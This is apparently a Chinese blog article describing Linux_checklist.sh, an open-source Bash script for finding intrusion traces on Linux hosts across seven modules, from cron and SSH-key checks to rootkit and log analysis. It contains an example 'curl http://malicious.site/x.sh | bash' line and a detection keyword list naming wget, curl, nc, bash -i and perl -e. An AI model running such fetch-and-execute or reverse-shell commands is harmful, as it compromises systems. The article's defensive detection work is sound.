Linux黑客入侵痕迹排查实战指南：一个脚本帮你揪出“隐形杀手”

Linux黑客入侵痕迹排查实战指南：一个脚本帮你揪出“隐形杀手”

前几天在某公众号看到一篇介绍Linux_checklist.sh开源工具的文章，受到启发，将其整理出来与大家分享。它能自动化完成7大模块、超过20项关键安全检查，助你快速定位系统入侵痕迹。

面对日益猖獗的 Linux 系统入侵事件，从挖矿木马、勒索软件到高级持续性威胁（APT），黑客往往会精心隐藏自己的踪迹，使传统检查手段难以发现。

安全运维人员经常面临一个难题：系统似乎运行正常，但 CPU 悄无声息地满载，或者深夜突然出现异常的外联流量。

如何系统性地进行安全排查，而不是“头痛医头，脚痛医脚”？

今天介绍一款开源工具Linux_checklist.sh，它将复杂的入侵痕迹排查自动化、系统化，涵盖从系统资源、网络连接到文件完整性的全方位检查。

项目地址：https://github.com/HuyaThomas/Linux_checklist

01 工具概览：7大检查模块

Linux_checklist.sh 是一个 Bash 脚本，专为快速、全面地检查 Linux 系统安全状况而设计。它不需要安装额外依赖，直接在目标系统上运行即可生成详尽的诊断报告。

脚本的核心设计理念是“无遗漏、可追溯”，其检查逻辑覆盖了黑客入侵后最常见的行为模式和痕迹残留。

脚本主要包含七大检查模块：

1. 系统资源检查：排查挖矿等资源消耗型恶意软件。
2. 网络连接分析：探测后门连接与异常监听。
3. 进程深度分析：捕捉无文件落地攻击等高级威胁。
4. 账号与权限审计：发现未授权账户与权限滥用。
5. 持久化与启动项扫描：清除病毒自启动机制。
6. 文件完整性校验：检测 Rootkit 和系统命令篡改。
7. 日志与痕迹分析：还原攻击者的操作路径。

每个模块都针对特定的安全威胁设计，组合起来形成了一套完整的安全体检方案。

02 系统资源检查：挖矿木马的“照妖镜”

挖矿木马是当前 Linux 系统面临的最常见威胁之一，其典型特征就是异常高的 CPU 或内存占用。

脚本首先会检查系统负载，列出资源占用 Top5 的进程。一个正常的数据库或 Web 服务进程突然持续占用 90% 以上的 CPU，就非常可疑。

除了进程列表，脚本还会检查磁盘空间使用情况。黑客有时会用日志文件或临时文件填满磁盘，制造服务瘫痪，或掩盖其他恶意行为。

内存使用情况也是关键指标。某些高级木马会尽量降低 CPU 使用率以避免被发现，但内存中会残留异常进程。通过对比/proc/meminfo和实际进程占用，可以发现隐藏的内存消耗。

03 网络连接分析：切断黑客的“生命线”

网络连接是黑客控制受害主机的通道，也是排查的重点。

首先检查网卡是否处于混杂模式。这是内网嗅探的典型迹象，黑客可能正在抓取内网传输的密码或敏感数据。脚本会检查每个网络接口的PROMISC标志。

DNS 和 Hosts 文件检查能发现网络劫持。黑客常修改这些配置，将合法域名指向自己的恶意服务器。脚本会对比当前 DNS 设置与已知安全配置，并扫描/etc/hosts中的异常条目。

端口监听检查能暴露隐藏的后门。除了常见的 22、80、443 端口，脚本会列出所有监听端口，特别是高位端口（如 31337、44444 等），这些常被用作反向 Shell 或 C2 通信端口。

外部连接统计能发现命令与控制（C2）服务器。脚本会列出连接最频繁的外部 IP（Top10），帮助识别可疑的境外 IP 或已知的恶意域名解析结果。

04 进程深度分析：揪出“隐身”恶意程序

现代恶意软件越来越擅长隐藏自己，传统的ps命令可能已经失效。

检查内存中已删除文件是脚本的核心功能之一。通过遍历/proc/[pid]/exe符号链接，脚本能发现那些“进程仍在运行，但对应的可执行文件已被删除”的情况。

这是无文件攻击和 Rootkit 的典型特征，旨在逃避基于文件的杀毒软件扫描。

分析高资源进程的详细信息，包括其启动参数、父进程关系、打开的文件描述符等。一个通过curl http://malicious.site/x.sh | bash启动的进程，其参数中会残留恶意 URL 痕迹。

进程树分析能揭示攻击链条。例如，一个短暂的wget进程下载了某个脚本，该脚本又启动了另一个守护进程，这种父子关系在正常的运维操作中很少见。

05 账号与权限审计：守住系统“大门”

权限提升和账号滥用是黑客维持访问的常用手段。

检查特权用户不止于root。脚本会扫描/etc/passwd，查找所有 UID=0 的用户。黑客常创建隐藏的超级用户账号，如将普通用户的 UID 改为 0，或在用户名中加入不可见字符。

影子文件分析/etc/shadow能发现哪些账户实际上可以登录（密码字段不为*或!）。一个被禁用的服务账户突然有了可登录的密码，极可能已被入侵。

Sudo 权限审计检查/etc/sudoers和/etc/sudoers.d/中的配置，找出谁拥有ALL=(ALL) ALL这类过高权限。黑客可能会给某个被控账户添加 sudo 权限，方便后续操作。

SSH 公钥检查遍历/root/.ssh/authorized_keys和所有/home/*/.ssh/authorized_keys文件。一个未知的公钥可能意味着攻击者已经设置了免密登录后门。

SSH 劫持检测检查是否存在~/.ssh/rc或/etc/ssh/sshrc文件，这些文件中的命令会在用户通过 SSH 登录时自动执行，是理想的恶意脚本植入点。

06 持久化与启动项：斩断“复活”机制

即使清除了恶意进程，如果未清除其持久化机制，系统重启后木马还会“复活”。

定时任务检查是最重要的环节。脚本不仅检查/etc/crontab和/etc/cron.d/，还会遍历所有用户的crontab -l结果。

特征匹配会自动扫描任务中是否包含wget、curl、nc、bash -i、perl -e等常用于下载或建立反向 Shell 的命令。

系统启动项检查涵盖 Systemd 服务（systemctl list-unit-files --type=service --state=enabled）和传统的/etc/rc.local。

黑客常会创建伪装成系统服务的恶意 Unit 文件，或在rc.local末尾添加一行启动命令。

其他持久化位置如~/.bashrc、~/.profile、/etc/profile.d/也可能被注入恶意命令，脚本会对这些文件进行关键词扫描。

07 文件完整性校验：发现“李鬼”命令

Rootkit 的核心技术就是替换系统命令，如将ps替换为不显示恶意进程的版本。

二进制校验利用系统包管理器（如 RPM）的校验功能。执行rpm -Vf /bin/ls等命令，对比核心命令的哈希值与官方包中的值是否一致。

任何修改（包括文件大小、MD5、权限、所有者）都会被标记出来。

SUID 文件扫描查找具有 SetUID 权限的可执行文件。这些文件运行时具有文件所有者的权限（常为 root），如果被植入后门，普通用户执行即可提权。

脚本会列出系统中所有 SUID 文件，并重点标记那些非常规位置或可疑名称的文件。

临时目录扫描检查/tmp和/var/tmp下是否有.sh、.py、.elf等可执行文件。黑客常在这些权限宽松的目录暂存攻击工具。

文件属性检查发现被chattr +i锁定的文件。黑客可能会锁定自己的恶意文件，防止被管理员删除，也可能会锁定关键的日志文件，阻止攻击记录被写入。

08 日志与痕迹分析：还原攻击时间线

日志是事后调查的宝贵证据，黑客往往会尝试清除或篡改日志。

暴力破解分析统计/var/log/secure（RHEL/CentOS）或/var/log/auth.log（Debian/Ubuntu）中登录失败次数最多的 IP 地址。

某个 IP 在短时间内尝试了数百次 SSH 登录，很可能是在进行暴力破解。

成功登录记录显示最近成功登录的用户、时间和源 IP。一个来自异常地理位置或非工作时间的 root 登录，值得深入调查。

账号变动记录搜索useradd和userdel的操作日志。攻击者常会创建隐藏账户作为后门，或在退出前删除自己创建的临时账户。

历史命令审计扫描 root 用户的~/.bash_history，以及其他有 sudo 权限用户的命令历史。

搜索wget、curl（下载木马）、tar（打包外传数据）、passwd（修改密码）、chmod 777（放宽权限）等敏感操作。注意，高级黑客会清空或篡改.bash_history，所以它的缺失或异常简短也是一个警示信号。

09 实战使用指南

获取与运行

wgethttps://raw.githubusercontent.com/HuyaThomas/Linux_checklist/main/linux_checklist.shchmod+x linux_checklist.shsudo./linux_checklist.sh

建议使用sudo运行以确保能访问所有必要的系统信息和文件。

输出解读

脚本执行后会生成一份结构化的报告，通常输出到屏幕并保存到文件。报告按上述七大模块组织，每个发现项会标记严重级别：

• 高危：强烈建议立即处理，如发现未知 SUID 文件、恶意定时任务。
• 中危：需要尽快审查，如异常的高资源进程、非常规监听端口。
• 低危/信息：供参考或优化使用，如磁盘空间不足警告。

安全注意事项

仅在授权环境下运行此脚本。脚本会读取大量系统敏感信息（如影子文件、私钥位置、进程内存映射等），输出文件必须妥善保管，避免二次泄露。

建议在隔离环境中分析报告。将输出文件传输到安全的分析机上进行查看，避免在可能已被入侵的主机上直接打开，防止潜在的键击记录或屏幕捕获恶意软件。

结合其他工具交叉验证。对于脚本发现的异常项，可使用strace、lsof、netstat -anp等原生命令进行深入分析，或使用chkrootkit、rkhunter等专业 Rootkit 检测工具进行二次扫描。

10 总结：主动防御，防患未然

Linux_checklist.sh 的价值不仅在于“事后检测”，更在于“主动防御”。定期运行此脚本，可以在攻击者完全控制系

统前发现蛛丝马迹。

它尤其适合以下场景：

• 云服务器或 VPS 突发性能异常时，快速判断是否被植入挖矿程序。
• 安全事件应急响应时，系统化收集证据，避免遗漏关键痕迹。
• 新接手或重要业务上线前，进行全面的安全基线检查。
• 作为自动化安全监控的一部分，定期生成安全状态报告。

安全是一场攻防不对称的战争，攻击者只需要找到一个漏洞，而防御者需要守护整个系统。

通过自动化工具将重复、复杂的检查流程标准化，运维人员可以将更多精力投入到安全架构优化和威胁分析中，真正提升系统的整体安全水位。

正如美国计算机应急准备小组（US-CERT）所言：“预防是理想的，但检测是必须的。” 在复杂的网络环境中，没有任何系统能保证100%不被入侵，关键在于能否快速发现、准确定位、有效清除。